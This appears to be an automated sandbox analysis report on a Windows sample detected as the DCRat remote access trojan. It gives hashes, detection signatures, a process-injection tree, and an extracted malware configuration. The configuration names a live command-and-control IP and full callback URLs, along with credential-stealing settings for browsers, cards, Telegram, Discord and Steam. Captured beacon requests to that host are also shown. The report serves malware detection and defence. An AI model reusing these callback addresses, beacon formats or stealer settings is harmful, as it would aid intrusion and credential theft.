Edit tour

Windows Analysis Report
a9rLzLY498.exe

Overview

General Information

Sample Name:	a9rLzLY498.exe
Original Sample Name:	5a09955b26de8ecdfd90121d3e208825.exe
Analysis ID:	1311370
MD5:	5a09955b26de8ecdfd90121d3e208825
SHA1:	f9ba5c15dca18cbbcac885c3d31b54b4416ff06f
SHA256:	9a813ede666b2e709555af5fd3da93ee77a30a1f615c2036e9161932482bf022
Tags:	exe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected DCRat

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

a9rLzLY498.exe (PID: 6684 cmdline: C:\Users\user\Desktop\a9rLzLY498.exe MD5: 5A09955B26DE8ECDFD90121D3E208825)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

InstallUtil.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: AF862061889F5B9B956E9469DCDAE773)

InstallUtil.exe (PID: 6752 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: AF862061889F5B9B956E9469DCDAE773)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"5\":\";\",\"b\":\"^\",\"F\":\"#\",\"N\":\"*\",\"U\":\"`\",\"w\":\"<\",\"m\":\" \",\"G\":\"-\",\"8\":\"&\",\"V\":\",\",\"L\":\"@\",\"Z\":\"$\",\"c\":\"~\",\"Y\":\"_\",\"S\":\")\",\"i\":\"!\",\"B\":\".\",\"3\":\"%\",\"t\":\"(\",\"j\":\"|\",\"R\":\">\"}", "PCRT": "{\"m\":\"!\",\"B\":\"`\",\"K\":\" \",\"T\":\")\",\"F\":\"~\",\"d\":\".\",\"0\":\"*\",\"U\":\"$\",\"V\":\"-\",\"R\":\"^\",\"W\":\"&\",\"G\":\"@\",\"C\":\"%\",\"E\":\"|\",\"S\":\";\",\"l\":\"<\",\"x\":\"_\",\"I\":\">\",\"D\":\"(\",\"t\":\"#\",\"Q\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8rQNupVUs4Gs7RYPGSpe", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "H2": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: a9rLzLY498.exe PID: 6684	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: InstallUtil.exe PID: 6752	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
3.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0xf6224:$x2: DCRat-Log# 0x40a66:$x3: DCRat.Code 0x40292:$v1: Plugin couldn't process this action! 0x402dc:$v2: Unknown command! 0xf62ae:$v4: Saving log... 0xf62ca:$v5: ~Work.log 0xf51df:$v8: %SystemDrive% - Slow 0xf5209:$v9: %UsersFolder% - Fast 0xf5233:$v10: %AppData% - Very Fast
0.2.a9rLzLY498.exe.1356a70.1.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.2.a9rLzLY498.exe.1356a70.1.unpack	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0xf4424:$x2: DCRat-Log# 0x3ec66:$x3: DCRat.Code 0x3e492:$v1: Plugin couldn't process this action! 0x3e4dc:$v2: Unknown command! 0xf44ae:$v4: Saving log... 0xf44ca:$v5: ~Work.log 0xf33df:$v8: %SystemDrive% - Slow 0xf3409:$v9: %UsersFolder% - Fast 0xf3433:$v10: %AppData% - Very Fast
0.2.a9rLzLY498.exe.1356a70.1.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.2.a9rLzLY498.exe.1356a70.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.a9rLzLY498.exe.1356a70.1.raw.unpack	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0xf6224:$x2: DCRat-Log# 0x40a66:$x3: DCRat.Code 0x40292:$v1: Plugin couldn't process this action! 0x402dc:$v2: Unknown command! 0xf62ae:$v4: Saving log... 0xf62ca:$v5: ~Work.log 0xf51df:$v8: %SystemDrive% - Slow 0xf5209:$v9: %UsersFolder% - Fast 0xf5233:$v10: %AppData% - Very Fast
0.2.a9rLzLY498.exe.1320000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.2.a9rLzLY498.exe.1320000.0.unpack	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x12be94:$x2: DCRat-Log# 0x766d6:$x3: DCRat.Code 0x75f02:$v1: Plugin couldn't process this action! 0x75f4c:$v2: Unknown command! 0x12bf1e:$v4: Saving log... 0x12bf3a:$v5: ~Work.log 0x12ae4f:$v8: %SystemDrive% - Slow 0x12ae79:$v9: %UsersFolder% - Fast 0x12aea3:$v10: %AppData% - Very Fast
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.InstallUtil.exe.400000.0.unpack

Malware Configuration Extractor: DCRat {"SCRT": "{\"5\":\";\",\"b\":\"^\",\"F\":\"#\",\"N\":\"*\",\"U\":\"`\",\"w\":\"<\",\"m\":\" \",\"G\":\"-\",\"8\":\"&\",\"V\":\",\",\"L\":\"@\",\"Z\":\"$\",\"c\":\"~\",\"Y\":\"_\",\"S\":\")\",\"i\":\"!\",\"B\":\".\",\"3\":\"%\",\"t\":\"(\",\"j\":\"|\",\"R\":\">\"}", "PCRT": "{\"m\":\"!\",\"B\":\"`\",\"K\":\" \",\"T\":\")\",\"F\":\"~\",\"d\":\".\",\"0\":\"*\",\"U\":\"$\",\"V\":\"-\",\"R\":\"^\",\"W\":\"&\",\"G\":\"@\",\"C\":\"%\",\"E\":\"|\",\"S\":\";\",\"l\":\"<\",\"x\":\"_\",\"I\":\">\",\"D\":\"(\",\"t\":\"#\",\"Q\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8rQNupVUs4Gs7RYPGSpe", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "H2": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "T": "0"}

Multi AV Scanner detection for submitted file

Source: a9rLzLY498.exe

ReversingLabs: Detection: 65%

Antivirus / Scanner detection for submitted sample

Source: a9rLzLY498.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB	Avira URL Cloud: Label: malware
Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn	Avira URL Cloud: Label: malware
Source: http://85.192.63.134	Avira URL Cloud: Label: malware
Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://85.192.63.134	Virustotal: Detection: 10%			Perma Link
Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn	Virustotal: Detection: 5%			Perma Link

Machine Learning detection for sample

Source: a9rLzLY498.exe

Joe Sandbox ML: detected

Source: a9rLzLY498.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: a9rLzLY498.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_0133F33A FindFirstFileExW,

0_2_0133F33A

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z

Source: Joe Sandbox View

ASN Name: LINEGROUP-ASRU LINEGROUP-ASRU

Source: global traffic	HTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Sep 2023 07:47:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Sep 2023 07:47:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 85.192.63.134
Source: unknown	TCP traffic detected without corresponding DNS query: 85.192.63.134
Source: unknown	TCP traffic detected without corresponding DNS query: 85.192.63.134
Source: unknown	TCP traffic detected without corresponding DNS query: 85.192.63.134
Source: unknown	TCP traffic detected without corresponding DNS query: 85.192.63.134
Source: unknown	TCP traffic detected without corresponding DNS query: 85.192.63.134

Source: InstallUtil.exe, 00000003.00000002.254163988.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://85.192.63.134
Source: InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn
Source: InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: global traffic	HTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134

Source: a9rLzLY498.exe, 00000000.00000002.239742090.0000000001669000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_07c13133-9

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen
Source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen
Source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen

.NET source code contains very large strings

Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs

Long String: Length: 368600

Source: a9rLzLY498.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0133D969	0_2_0133D969
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0134199F	0_2_0134199F
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_01323030	0_2_01323030
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0133802F	0_2_0133802F
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_013398BA	0_2_013398BA
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_01343323	0_2_01343323
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0132FD0C	0_2_0132FD0C
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_013336B0	0_2_013336B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_029C453E	3_2_029C453E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_029C5AE8	3_2_029C5AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_029C8F20	3_2_029C8F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_029C8F12	3_2_029C8F12

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: String function: 0132A780 appears 51 times

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_01322540 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,CreateProcessW,VirtualAllocEx,GetThreadContext,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,TerminateProcess,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,ResumeThread,

0_2_01322540

Source: a9rLzLY498.exe, 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamelibcrypto$ vs a9rLzLY498.exe

Source: a9rLzLY498.exe

Static PE information: Section: .data ZLIB complexity 0.9969699357588857

Source: a9rLzLY498.exe

ReversingLabs: Detection: 65%

Source: a9rLzLY498.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\a9rLzLY498.exe C:\Users\user\Desktop\a9rLzLY498.exe
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/2@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll

Jump to behavior

Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 85Z.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
